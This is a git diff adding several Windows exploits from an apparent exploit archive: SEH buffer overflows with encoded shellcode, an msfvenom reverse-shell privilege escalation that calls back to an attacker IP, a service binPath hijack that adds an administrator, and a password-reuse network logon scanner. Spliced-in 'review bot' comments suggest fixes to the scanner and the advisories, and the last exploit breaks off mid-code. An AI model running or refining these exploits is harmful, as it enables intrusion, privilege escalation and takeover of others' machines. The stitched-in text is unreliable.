+# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.12.exe
+# Tested Version: 11.12
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to produce the crash:
+# 1.- Run python code: AbsoluteTelnet 11.12_username_ssh1.py
+# 2.- Open absolutetelnet_username_SSH1.txt and copy content to clipboard
+# 3.- Open AbsoluteTelnet
+# 4.- Select "new connection file", "Connection", "SSH1", "Use last username"
+# 5.- In "username" field paste Clipboard
+# 6.- Select "OK"
+# 7.- Crashed
+
+buffer = "\x41" * 1000
+f = open ("absolutetelnet_username_SSH1.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/48283.txt b/exploits/windows/local/48283.txt
new file mode 100644
index 000000000..f6b3529a0
--- /dev/null
+++ b/exploits/windows/local/48283.txt
@@ -0,0 +1,70 @@ +# Exploit Title: Memu Play 7.1.3 - Insecure Folder Permissions +# Discovery by: chuyreds +# Discovery Date: 2020-03-08 +# Vendor Homepage: https://www.memuplay.com/ +# Software Link : https://www.memuplay.com/download-en.php?file_name=Memu-Setup&from=official_release +# Tested Version: 7.1.3 +# Vulnerability Type: Local +# Tested on OS: Windows 10 Pro x64 es + +# Description: +# Memu Play 7.1.3 suffers from Privilege Escalation due to insecure file permissions + +# Prerequisites +# Local, Low privilege access with restart capabilities + +# Details +# By default the Authenticated Users group has the modify permission to ESM folders/files as shown below. +# A low privilege account is able to rename the MemuService.exe file located in this same path and replace +# with a malicious file that would connect back to an attacking computer giving system level privileges +# (nt authority\system) due to the service running as Local System. +# While a low privilege user is unable to restart the service through the application, a restart of the +# computer triggers the execution of the malicious file. + +C:\>icacls "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe" +C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe Everyone:(I)(F) + BUILTIN\Administradores:(I)(F) + BUILTIN\Usuarios:(I)(F) + NT AUTHORITY\SYSTEM:(I)(F) + APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX) + APPLICATION PACKAGE AUTHORITY\TODOS LOS PAQUETES DE APLICACIÓN RESTRINGIDOS:(I)(RX) + +Se procesaron correctamente 1 archivos; error al procesar 0 archivos + + +C:\>sc qc MEmuSVC +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: MEmuSVC + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe" + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : MEmuSVC + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem + +# Proof of Concept + +1. 
Generate malicious .exe on attacking machine + msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.130 LPORT=443 -f exe > /var/www/html/MemuService.exe + +2. Setup listener and ensure apache is running on attacking machine + nc -lvp 443 + service apache2 start + +3. Download malicious .exe on victim machine + Open browser to http://192.168.1.130/MemuService.exe and download + +4. Overwrite file and copy malicious .exe. + Renename C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe > MemuService.bak + Copy/Move downloaded 'MemuService.exe' file to C:\Program Files (x86)\Microvirt\MEmu\ + +5. Restart victim machine + +6. Reverse Shell on attacking machine opens + C:\Windows\system32>whoami + whoami + nt authority\system \ No newline at end of file diff --git a/exploits/windows/local/48293.py b/exploits/windows/local/48293.py new file mode 100755 index 000000000..13ca75c29 --- /dev/null +++ b/exploits/windows/local/48293.py 
@@ -0,0 +1,79 @@ +# Exploit Title: Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH) +# Date: 2020-04-04 +# Author: Felipe Winsnes +# Software Link: http://download.cnet.com/Triologic-Media-Player/3000-2139_4-10691520.html +# Version: 8 +# Tested on: Windows 7 (x86) + +# Proof of Concept: +# 1.- Run the python script, it will create a new file called "poc.m3l". +# 2.- Open the Application. +# 3.- Some windows warning boxes regarding sound issues may pop up, just click OK. +# 4.- Click on the bottom-right button that displays an arrow and has written "LIST". +# 5.- Select the file "poc.m3l". +# 6.- Profit. + +import struct + +# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/unicode_mixed BufferRegister=EAX EXITFUNC=thread +# Payload size: 512 bytes + +buf = b"" +buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49" +buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41" +buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41" +buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51" +buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31" +buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41" +buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41" +buf += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41" +buf += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41" +buf += b"\x47\x42\x39\x75\x34\x4a\x42\x79\x6c\x7a\x48\x61\x72" +buf += b"\x39\x70\x6b\x50\x49\x70\x73\x30\x54\x49\x47\x75\x70" +buf += b"\x31\x79\x30\x4f\x74\x72\x6b\x70\x50\x70\x30\x32\x6b" +buf += b"\x51\x42\x7a\x6c\x74\x4b\x42\x32\x6e\x34\x64\x4b\x64" +buf += b"\x32\x6b\x78\x6c\x4f\x57\x47\x4d\x7a\x4d\x56\x4e\x51" +buf += b"\x59\x6f\x46\x4c\x4f\x4c\x71\x51\x61\x6c\x49\x72\x4c" +buf += b"\x6c\x6d\x50\x36\x61\x46\x6f\x6c\x4d\x4a\x61\x37\x57" +buf += b"\x69\x52\x7a\x52\x31\x42\x51\x47\x74\x4b\x6e\x72\x4a" +buf += b"\x70\x44\x4b\x30\x4a\x4d\x6c\x34\x4b\x6e\x6c\x5a\x71" +buf += 
b"\x74\x38\x39\x53\x6d\x78\x49\x71\x5a\x31\x70\x51\x62" +buf += b"\x6b\x70\x59\x6b\x70\x5a\x61\x46\x73\x62\x6b\x4e\x69" +buf += b"\x4a\x78\x48\x63\x4f\x4a\x61\x39\x72\x6b\x4d\x64\x62" +buf += b"\x6b\x4a\x61\x36\x76\x4c\x71\x59\x6f\x44\x6c\x45\x71" +buf += b"\x58\x4f\x6a\x6d\x49\x71\x39\x37\x4d\x68\x39\x50\x73" +buf += b"\x45\x58\x76\x69\x73\x43\x4d\x4c\x38\x4f\x4b\x31\x6d" +buf += b"\x4c\x64\x72\x55\x58\x64\x72\x38\x62\x6b\x30\x58\x4f" +buf += b"\x34\x6a\x61\x7a\x33\x31\x56\x54\x4b\x4c\x4c\x6e\x6b" +buf += b"\x44\x4b\x50\x58\x4d\x4c\x4a\x61\x38\x53\x72\x6b\x5a" +buf += b"\x64\x54\x4b\x5a\x61\x58\x50\x33\x59\x61\x34\x6d\x54" +buf += b"\x6c\x64\x71\x4b\x51\x4b\x6f\x71\x62\x39\x70\x5a\x6f" +buf += b"\x61\x79\x6f\x47\x70\x61\x4f\x61\x4f\x71\x4a\x44\x4b" +buf += b"\x4d\x42\x38\x6b\x34\x4d\x4f\x6d\x42\x4a\x49\x71\x62" +buf += b"\x6d\x42\x65\x45\x62\x69\x70\x39\x70\x59\x70\x50\x50" +buf += b"\x51\x58\x4d\x61\x74\x4b\x42\x4f\x33\x57\x6b\x4f\x46" +buf += b"\x75\x37\x4b\x47\x70\x6b\x6d\x6e\x4a\x5a\x6a\x53\x38" +buf += b"\x46\x46\x52\x75\x65\x6d\x45\x4d\x6b\x4f\x57\x65\x6d" +buf += b"\x6c\x7a\x66\x43\x4c\x6c\x4a\x35\x30\x59\x6b\x67\x70" +buf += b"\x50\x75\x6b\x55\x45\x6b\x4d\x77\x5a\x73\x32\x52\x52" +buf += b"\x4f\x30\x6a\x59\x70\x51\x43\x69\x6f\x38\x55\x52\x43" +buf += b"\x50\x61\x32\x4c\x61\x53\x6c\x6e\x43\x35\x51\x68\x6f" +buf += b"\x75\x4d\x30\x41\x41" + +nseh = "\x71\x41" +seh = "\x41\x4a" + +alignment = "" +alignment += "\x54\x71" # push ebx, padding +alignment += "\x58\x71" # pop eax, padding +alignment += "\x05\x20\x22" # add eax, 0x22002000 +alignment += "\x71" # Padding +alignment += "\x2D\x19\x22" # sub eax, 0x22001900 +alignment += "\x71" # Padding +alignment += "\x50\x71" # push eax, padding +alignment += "\xC3" # retn + +buffer = "A" * 536 + nseh + seh + "\x41\x71\x41\x71" + alignment + "C" * 71 + buf + "C" * 2000 +f = open ("poc.m3l", "w") +f.write(buffer) +f.close() \ No newline at end of file 
diff --git a/exploits/windows/local/48299.txt b/exploits/windows/local/48299.txt
new file mode 100644
index 000000000..654d0b495
--- /dev/null
+++ b/exploits/windows/local/48299.txt
@@ -0,0 +1,313 @@ +# Title: Microsoft NET USE win10 - Insufficient Authentication Logic +# Date: 2020-04-04 +# Author: hyp3rlinx +# Vendor: www.microsoft.com +# CVE: N/A + + +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NET-USE-INSUFFICIENT-PASSWORD-PROMPT.txt +[+] twitter.com/hyp3rlinx +[+] ISR: ApparitionSec + + +[Vendor] +www.microsoft.com + + +[Product] +Windows "net use" Command + +Connects a computer to or disconnects a computer from a shared resource, or displays information about computer connections. +The command also controls persistent net connections. Used without parameters, net use retrieves a list of network connections. + + +[Vulnerability Type] +Insuffient Password Prompt + + +[CVE Reference] +N/A + + +[Security Issue] +The Windows "net use" network logon type-3 command does not prompt for authentication when the built-in Administrator account +is enabled and both remote and originating systems suffer from password reuse. This also works as "standard" user but unfortunately +we do not gain high integrity privileges. However, it opens the door and increases the attack surface if the box we laterally move to +has other vulnerabilities present. + +In contrast authenticating using the "unc path" "\\x.x.x.x\c$" using an explorer type logon does prompt for credentials as expected. +The authentication mechanism between the two network logon methods are inconsistent and in my opinion leaves an authentication loophole invitation. +Moreover, since this targets built-in Administrator account, one would think there would be more or equal security measures in place not less. + +Requirements: +1) Remote system built-in Administrator account is enabled +2) Origination system users account password and the remote system Administrator passwords match (reuse). 
+ +Typically, to gain Admin privileges on remote logon you may have to create and enable "LocalAccountTokenFilterPolicy" but NOT in this case. +Again, the "LocalAccountTokenFilterPolicy" registry setting does NOT need to exist and is NOT enabled and has no bearing on the issue. + +However, if "FilterAdministratorToken" is enabled in registry on the remote system then the above loophole scenario fails. +Interestingly, the "FilterAdministratorToken" setting does not seem to exist by default in the Windows registry. + +Therefore, if an attacker pops a box they can check "MountPoints2" registry values usually used by forensic analysts for previous network connections +and try them and if theres password reuse (likely) BOOM automagic logon. + +This vuln occurs due to an inconsistent password dialog prompting and whether the "net use" logon method is used. +When testing make sure to logout then log back in after changing passwords so the environment is clean. + +e.g. + +1) Passwords for both systems are different and remote built-in Administrator account active: + +C:\sec>net use z: \\192.168.x.x\c$ /user:Administrator + +Enter the password for 'Administrator' to connect to '192.168.x.x': +System error 5 has occurred. + +Access is denied. + +2) Passwords for both origination system and remote match: + +C:\sec>net use z: \\192.168.x.x\c$ /user:Administrator +The command completed successfully. + +By the way as a side note DCERPC calls work as well, if both systems happen to have same password. +c:\>getmac /s x.x.x.x /U Administrator + +MSRC in their response, pointed out that "No login prompt on remote connection if both Administrator password are the same." +Ok, but why does "net use" not follow the same pattern as doing a UNC-Path type of logon, where we get the expected cred dialog box? + +Expected result: Consistent password dialog box, no matter if passwords match or not. +Actual Result: No prompt for a password if both systems passwords are the same. 
+ +Tested successfully on fully patched Windows 10 using VM, also across LAN to a non-domain connected PC. + + +[Exploit/POC] +import os,re,time,signal,sys +from subprocess import * +from multiprocessing import Process + +#By John Page (aka hyp3rlinx) +#Apparition Security +#twitter.com/hyp3rlinx +#----------------------------------- +#When a remote systems built-in Administrator account is enabled and both the remote and the target system +#passwords match (password reuse) theres no prompt for credentials and we get logged in automagically. +# +#MountPoints2 and Terminal server client hints in the Windows registry can help us. +#Typically, MountPoints2 is used by Forensic analysts to help determine where an attacker laterally moved to previously. +#REG Query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /F "##" (we want network logons) +#MountPoints2 key entries are stored like '##10.2.1.40#c$' +#----------------------------------------------------------- + +BANNER=""" + _ ______________ ___ ____ __ _______ ______ + / | / / ____/_ __/ / | / __ )/ / / / ___// ____/ + / |/ / __/ / / / /| | / __ / / / /\__ \/ __/ + / /| / /___ / / / ___ |/ /_/ / /_/ /___/ / /___ +/_/ |_/_____/ /_/ /_/ |_/_____/\____//____/_____/ + + By Hyp3rlinx + ApparitionSec +""" + +DRIVE="X" +FINDME="The command completed successfully." +REG_MOUNT2='REG Query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /F "##"' +REG_RDPUSERS="REG Query \"HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers\""+" /s" +VULN_FOUND=set() +DELAY=2 #Any lower and we may get inaccurate results. +rdp_server_lst=[] + +#Return prior network logons to remote systems. +def mountpoints2(): + mntpoint2_connections=[] + try: + p = Popen(REG_MOUNT2, stdout=PIPE, stderr=PIPE, shell=True) + tmp = p.stdout.readlines() + except Exception as e: + print("[!] 
"+str(e)) + return False + for x in tmp: + idx = x.find("##") + clean = x[idx:] + idx2 = clean.rfind("#") + ip = clean[2:idx2] + ip = re.sub(r"#.*[A-Z,a-z]","",ip) + if ip not in mntpoint2_connections: + mntpoint2_connections.append(ip) + mntpoint2_connections = list(filter(None, mntpoint2_connections)) + p.kill() + return mntpoint2_connections + + +#Terminal server client stores remote server connections. +def rdp_svrs(): + global rdp_server_lst + try: + p = Popen(REG_RDPUSERS, stdout=PIPE, stderr=PIPE, shell=True) + tmp = p.stdout.readlines() + for key in tmp: + if key.find("Servers")!=-1: + pos = key.rfind("\\") + srv = key[pos + 1:].replace("\r\n","").strip() + rdp_server_lst.append(srv) + p.kill() + except Exception as e: + print("[!] "+str(e)) + return False + return True + + +#Disconnect +def del_vuln_connection(ip): + try: + print("[!] Disconnecting vuln network logon connection.\n") + call(r"net use "+DRIVE+":"+" /del") + except Exception as e: + print("[!] "+str(e)) + + +#Check connection +def chk_connection(ip): + print("[+] Testing: "+ip) + sys.stdout.flush() + cmd = Popen(['ping.exe', ip, "-n", "1"], stderr=PIPE, stdout=PIPE, shell=True) + stderr, stdout = cmd.communicate() + if "Reply from" in stderr and "Destination host unreachable" not in stderr: + print("[*] Target up!") + return True + else: + print("[!] 
Target unreachable :(") + return False + + +#Test vuln +def Test_Password_Reuse(ip): + print("[+] Testing "+ip + " the builtin Administrator account.\n") + sys.stdout.flush() + try: + p = Popen("net use X: \\\\"+ip+"\\c$ /user:Administrator", stdout=PIPE, stderr=PIPE, shell=True) + err = p.stderr.readlines() + + if err: + e = str(err) + if e.find("error 53")!=-1: + print("[*] Network path not found\n") + return + elif e.find("error 1219")!=-1: + print("[*] Target connections to a server or shared resource by the same user, using more than one user name are disallowed.\n") + return + elif e.find("error 85")!=-1: + print("[*] The local device name is already in use.\n") + return + else: + print(e+"\n") + + tmp = p.stdout.read() + + if FINDME in tmp: + print("[*] Password reuse for the built-in Administrator found!") + print("[+] Connected to target: "+ ip) + VULN_FOUND.add(ip+":Administrator") + del_vuln_connection(ip) + p.kill() + except Exception as e: + print("[!] "+str(e)) + + + +#Authenticate +def auth(ip): + action_process = Process(target=Test_Password_Reuse, args=(ip,)) + action_process.start() + action_process.join(timeout=5) + action_process.terminate() + + +if __name__ == "__main__": + + print(BANNER) + print("[+] Windows 'net use' Network Logon Type-3") + print("[+] Insufficient Password Prompt") + print("[+] By hyp3rlinx\n") + + time.sleep(3) + + print("[+] Deleting any existing network logons to start clean.") + + #Make sure no exist sessions already exist. + call(r"net use * /del /y") + sys.stdout.flush() + time.sleep(1) + + + #Grab previous connections from MountPoints2 if any. + rdp_svrs() + svrlst=mountpoints2() + + if svrlst: + svrlst + rdp_server_lst + else: + svrlst = rdp_server_lst + + if not svrlst: + print("[*] No MountPoints2 artifacts found, enter an IP.") + sys.stdout.flush() + ip=raw_input("[+] Target IP> ") + if chk_connection(ip): + auth(ip) + else: + #We have MountPoints2 or RDP Server list IP we can try. 
+ for ip in svrlst: + if chk_connection(ip): + auth(ip) + + time.sleep(DELAY) + + + if len(VULN_FOUND) != 0: + print("[*] Located the following vulnerable systems:") + sys.stdout.flush() + for v in VULN_FOUND: + print("[+] "+v) + else: + print("[+] All previous attempts failed, enter an IP and give it a shot!.") + sys.stdout.flush() + ip=raw_input("[+] Target IP> ") + if chk_connection(ip): + auth(ip) + + + +[POC Video URL] +https://www.youtube.com/watch?v=Je93Neb0k8g + + +[Network Access] +Remote + + +[Severity] +High + + +[Disclosure Timeline] +Vendor Notification: February 28, 2020 +MSRC "behavior you are reporting is by design" : March 30, 2020 +April 5, 2020 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/exploits/windows/local/48306.txt b/exploits/windows/local/48306.txt new file mode 100644 index 000000000..5f1850679 --- /dev/null +++ b/exploits/windows/local/48306.txt 
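Review bot: In the `__main__` block, `svrlst + rdp_server_lst` discards its result, so whenever `mountpoints2()` returns entries the Terminal Server Client list is never merged into the targets; it should read `svrlst += rdp_server_lst` (or `svrlst.extend(rdp_server_lst)`). In `chk_connection`, `stderr, stdout = cmd.communicate()` names the tuple backwards — `communicate()` returns `(stdout, stderr)` — so the `"Reply from"` test only works because the variable called `stderr` actually holds ping's stdout; `stdout, stderr = cmd.communicate()` and testing `stdout` would make the intent readable. `Test_Password_Reuse` builds its `net use` command by string concatenation with `ip`, which comes from `raw_input`, and runs it with `shell=True`; passing an argument list without `shell=True` keeps the shell from parsing the value. The script relies on `raw_input` and on `str`-typed pipe output, so it runs only under Python 2, which the header should state.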
@@ -0,0 +1,52 @@
+# Exploit Title: Windscribe 1.83 - 'WindscribeService' Unquoted Service Path
+# Date: 2020-04-10
+# Exploit Author: MgThuraMoeMyint
+# Vendor Homepage: https://windscribe.com
+# Version: v1.83 Build 20
+# Tested on: Windows 10, version 1909
+
+In windscribe v1.83 , there is a service via windscribe that every
+authenticated user can modify.
+
+C:\Users\mgthura>sc qc WindscribeService
+[SC] QueryServiceConfig SUCCESS
+SERVICE_NAME: WindscribeService
+TYPE : 10 WIN32_OWN_PROCESS
+START_TYPE : 2 AUTO_START
+ERROR_CONTROL : 1 NORMAL
+BINARY_PATH_NAME : C:\Program Files (x86)\Windscribe\WindscribeService.exe
+LOAD_ORDER_GROUP :
+TAG : 0
+DISPLAY_NAME : WindscribeService
+DEPENDENCIES :
+SERVICE_START_NAME : LocalSystem
+
+That shows that running as Local System this means that the
+BINARY_PATH_NAME parameter can be modified to execute any command on
+the system.
+I'll change binary_path_name with a command that add a user to
+administrators group , so it will be
+
+C:\Users\mgthura>sc config WindscribeService binPath= "net localgroup
+administrators pentest /add"
+[SC] ChangeServiceConfig SUCCESS
+
+C:\Users\mgthura>sc stop WindscribeService
+
+SERVICE_NAME: WindscribeService
+TYPE : 10 WIN32_OWN_PROCESS
+STATE : 3 STOP_PENDING
+(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
+WIN32_EXIT_CODE : 0 (0x0)
+SERVICE_EXIT_CODE : 0 (0x0)
+CHECKPOINT : 0x4
+WAIT_HINT : 0x0
+
+C:\Users\mgthura>sc start WindscribeService
+[SC] StartService FAILED 1053:
+The service did not respond to the start or control request in a timely fashion.
+
+Restarting service will cause the service to fail as the binary path
+would not point into the actual executable of the service.
+However the command will be executed successfully and the user will be
+added to the local administrators group.
\ No newline at end of file
diff --git a/exploits/windows/local/48314.py b/exploits/windows/local/48314.py
new file mode 100755
index 000000000..9a6660afb
--- /dev/null
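Review bot: The title names an "Unquoted Service Path", but what the advisory demonstrates is that a non-administrative user can change the service's configuration with `sc config WindscribeService binPath=`, which is a weak service DACL (SERVICE_CHANGE_CONFIG granted too broadly), not the unquoted-path issue; `BINARY_PATH_NAME` is indeed unquoted and contains spaces, but nothing here exploits that. The title and the opening sentence should name the actual weakness, and the claim that "every authenticated user can modify" the service is not backed by any output showing the service's permissions — the advisory should include the service ACL listing that shows which principals hold change-config rights, and the `sc qc` output alone does not establish it. The remediation the vendor needs is also different for the two issues (tightening the service DACL versus quoting the path), so the mislabel matters to whoever triages it.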
+++ b/exploits/windows/local/48314.py 
@@ -0,0 +1,324 @@ +# Exploit Title: Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH) +# Exploit Author: Bobby Cooke +# Date: 2020-04-11 +# Vendor: Drive Software Company +# Vendor Site: http://www.drive-software.com +# Software Download: http://www.drive-software.com/download/freeclock.exe +# Tested On: Windows 10 - Pro 1909 (x86) & Home 1909 (x86) +# - Does not work on x64 version +# Version: Free Desktop Clock 3.0 +# Recreate: Install & Open > Time Zones > 'Enter display name' textbox > paste buffer + +############################### CRASH INFO ############################### +# [!] Access violation +# 042D15E7 8908 mov [eax], ecx ; FreeDesk.00440044 +# SEH chain of main thread +# Address SE handler +# 0014EE24 FreeDesk.00410041 <- Structured Exception Handler Overwrite +# 00410041 74737953 +# 69620C00 *** CORRUPT ENTRY *** +############################### CRASH INFO ############################### + +File = 'poc.txt' + +######################### EXPLOIT ENVIRONMENT INFO ######################### +#badChars = '\x00\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e' +#badChars += '\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9e\x9f' +#goodChars = '\x81\x8D\x8F\x90\x9D' (within 0x80-0x9f) + +# Base | Rebase | SafeSEH | ASLR | NXCompat | Modulename +# 0x00400000 | False | False | False | False | [FreeDesktopClock.exe] +# 0x042b0000 | True | False | False | False | [Clock.dll] +######################### EXPLOIT ENVIRONMENT INFO ######################### + +os_nSEH = '\x41'*(457) # Offset to nSEH Overwrite +nSEH = '\xeb\x05' # jmp short +2 +SEH = '\xeb\x43' # 0x004300eb: pop esi# pop ebx# ret [FreeDesktopClock.exe] +# nSEH & SEH translated opcodes after Pop-Pop-Ret +# EB 00 jmp short +2 +# 05 00EB0043 add eax, 4300EB00 + +# GetPC to decode our decoder using Venetian Blinds technique +getPC = '\x73' # add [ebx], dh # nop | [EBX] = writable memory +getPC += '\x61' # popad # [ESP] = &Payload +getPC += '\x72' # add [edx], dh # 
realigns execution for 1 byte opcodes + +ebx2eax = '\x58' # pop eax # EAX = &Payload +ebx2eax += '\x72' # add [edx], dh + +# Use Venetian Blinds technique to fix our mangled decoder +# + Using the Venetian Blinds Technique costs 14 bytes to fill 1 0x00 with 1 legit shellcode byte. +# +# Ajust EAX to &Decoder +getDecoder = '\x05\x13\x11' # add eax, 0x11001300 # EAX + 512-bytes +getDecoder += '\x72' # add [edx], dh +getDecoder += '\x2D\x11\x11' # sub eax, 0x11001100 # EAX = &Decoder +getDecoder += '\x72' # add [edx], dh +getDecoder += '\x50' # push eax # [ESP] = &Decoder +getDecoder += '\x72' # add [edx], dh + +############################# ZIPPER DECODER ############################### +# Set EAX = First non-null byte of shellcode +# init: +# 1 | 50 | push eax # EAX = &Shellcode +# 2 | 5F | pop edi # EDI = Decoder Destination Base Address +# 3 | 47 | inc edi # First 0x00 byte of shellcode +# 4:5 | 33D2 | xor edx, edx +# 6:7 | 33C9 | xor ecx, ecx +# 8:11 | 66:B9 1004 | mov cx, 410 # ECX = Loop Counter +# decodeLoop: +# 12:13 | 33DB | xor ebx, ebx +# 14 | 42 | inc edx # EDX+EAX = &SourceShellcodeByte +# 15 | 42 | inc edx # increment to next non-null byte +# 16:17 | 32DB | xor bl, bl # clear BL to hold next shellcode byte +# 18:20 | 021C10 | add bl, [eax+edx] # BL = SourceShellcodeByte +# 21:22 | 203F | and [edi], bh # [EDI] = SC-byte, clear with: AND 0x00 +# 23:24 | 301F | xor [edi], bl # Write next byte of shellcode +# 25 | 47 | inc edi +# 26 | 49 | dec ecx +# 27:28 | 74 02 | je short jmp2code +# 29:30 | ^ EB ED | jmp short decodeLoop +# jmp2code: +# 31 | 50 | push eax +# 32 | C3 | ret +################################################3########################### + +#DecoderHex = '505F4733D233C966B9100433DB424232DB021C10203F301F47497402EBED50C3' +firstHalf = '\x50\x47\xD2\xC9\xB9\x04\xDB\x42\xDB\x1C\x20\x30\x47\x74\xEB\x50' +#venBldHalf = '5F 33 33 66 10 33 42 32 02 10 3F 1F 49 02 ED C3' +# 2 4 6 8 10 12 14 16 18 20 22 24 26 28 30 32 + +# Note: These nop unicode 
instructions are actually [reg+0x00] not [reg] +# The [reg] version (0032) is 2 bytes. The [reg+0x00] version (007200) is 3 bytes +# Use the 3 byte version for Venetian Blinds alignment + # Example: + # nasm > add [edx], dh + # 00000000 0032 add [edx],dh + # nasm > add [edx+00], dh + # 00000000 0032 add [edx],dh + # nasm > add [edx+01], dh + # 00000000 007201 add [edx+0x1],dh + # + This happens when typing in ASM commands into msf-nasm_shell and immunity + +## 2nd byte - \x00 => \x5F +venBlinds = '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\xC6\x5F' # mov byte [eax], 0x50 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 4th byte - \x00 => \x33 +venBlinds += '\xC6\x33' # mov byte [eax], 0x33 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 6th byte - \x00 => \x33 +venBlinds += '\xC6\x33' # mov byte [eax], 0x33 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 8th byte - \x00 => \x66 +venBlinds += '\xC6\x66' # mov byte [eax], 0x66 +venBlinds += '\x72' # add [edx], dh // nop to realign 
opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 10th byte - \x00 => \x10 +venBlinds += '\xC6\x10' # mov byte [eax], 0x10 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 12th byte - \x00 => \x33 +venBlinds += '\xC6\x33' # mov byte [eax], 0x33 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 14th byte - \x00 => \x42 +venBlinds += '\xC6\x42' # mov byte [eax], 0x42 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 16th byte - \x00 => \x32 +venBlinds += '\xC6\x32' # mov byte [eax], 0x32 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 
